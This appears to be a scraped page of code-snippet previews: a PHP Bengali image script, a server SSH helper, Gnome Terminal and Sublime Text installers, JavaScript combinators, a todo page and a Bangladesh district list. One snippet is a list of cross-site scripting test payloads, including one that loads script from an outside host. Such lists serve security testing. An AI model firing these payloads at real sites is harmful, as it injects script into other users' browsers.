Getting started:
Related tutorials:
| <?php | |
| require 'Unicode2Bijoy.php'; // https://github.com/mirazmac/Unicode2Bijoy | |
| use mirazmac\Unicode2Bijoy; | |
| $str = Unicode2Bijoy::convert("যুক্তাক্ষর প্রিন্ট করা \n খুবই সোজা"); //convert the text | |
| $im = imagecreatetruecolor(300, 300); //create the image | |
| $bg = imagecolorallocate($im, 255, 255, 255); //allocating white background image |
| """ | |
| Documentation | |
| 1. At first, save the entire script as servers.py in /home/your-username/ directory. | |
| Also you can simply use the below command: | |
| curl "https://gist.githubusercontent.com/maateen/1582a28d62437caaf5cf9098303bab79/raw/e216b3b1ff8f1323fb79de4ae5a4c5b24a8b2c4d/servers.py" > ~/servers.py | |
| 2. Change info in servers = {} portion according to your need. | |
| Always use Server Identity at the left side of : sign and SSH Login Command at the right side. |
| ';alert(String.fromCharCode(88,83,83))//';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//--></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT> | |
| '';!--"<XSS>=&{()} | |
| 0\"autofocus/onfocus=alert(1)--><video/poster/onerror=prompt(2)>"-confirm(3)-" | |
| <script/src=data:,alert()> | |
| <marquee/onstart=alert()> | |
| <video/poster/onerror=alert()> | |
| <isindex/autofocus/onfocus=alert()> | |
| <SCRIPT SRC=http://ha.ckers.org/xss.js></SCRIPT> | |
| <IMG SRC="javascript:alert('XSS');"> | |
| <IMG SRC=javascript:alert('XSS')> |
Getting started:
Related tutorials:
| #!/usr/bin/env bash | |
| # Base16 - Gnome Terminal color scheme install script | |
| [[ -z "$PROFILE_NAME" ]] && PROFILE_NAME="flatabulous-terminal" | |
| [[ -z "$PROFILE_SLUG" ]] && PROFILE_SLUG="flatabulous-terminal" | |
| [[ -z "$DCONF" ]] && DCONF=dconf | |
| [[ -z "$UUIDGEN" ]] && UUIDGEN=uuidgen | |
| dset() { | |
| local key="$1"; shift |
| const I = x => x; | |
| const K = x => y => x; | |
| const A = f => x => f(x); | |
| const T = x => f => f(x); | |
| const W = f => x => f(x)(x); | |
| const C = f => y => x => f(x)(y); | |
| const B = f => g => x => f(g(x)); | |
| const S = f => g => x => f(x)(g(x)); | |
| const P = f => g => x => y => f(g(x))(g(y)); | |
| const Y = f => (g => g(g))(g => f(x => g(g)(x))); |
| <!DOCTYPE hmtl> | |
| <html> | |
| <head><title>My todo list</title></head> | |
| <body> | |
| <h1>My todo list:</h1> | |
| <form> | |
| <input type="text" id="item" /> | |
| <input type="submit" id="save" value="Save" /> | |
| </form> | |
| <ul id="list"></ul> |
| { | |
| "Rajshahi": { | |
| "Joypurhat": [ | |
| "Akkelpur", | |
| "Joypurhat Sadar", | |
| "Kalai", | |
| "Khetlal", | |
| "Panchbibi" | |
| ], | |
| "Bogura": [ |
Other people's projects:
My projects (tutorials are on my blog at http://maxoffsky.com):
| @echo off | |
| SET st2Path=C:\Program Files\Sublime Text 3\sublime_text.exe | |
| rem add it for all file types | |
| @reg add "HKEY_CLASSES_ROOT\*\shell\Open with Sublime Text 3" /t REG_SZ /v "" /d "Open with Sublime Text 3" /f | |
| @reg add "HKEY_CLASSES_ROOT\*\shell\Open with Sublime Text 3" /t REG_EXPAND_SZ /v "Icon" /d "%st2Path%,0" /f | |
| @reg add "HKEY_CLASSES_ROOT\*\shell\Open with Sublime Text 3\command" /t REG_SZ /v "" /d "%st2Path% \"%%1\"" /f | |
| rem add it for folders | |
| @reg add "HKEY_CLASSES_ROOT\Folder\shell\Open with Sublime Text 3" /t REG_SZ /v "" /d "Open with Sublime Text 3" /f |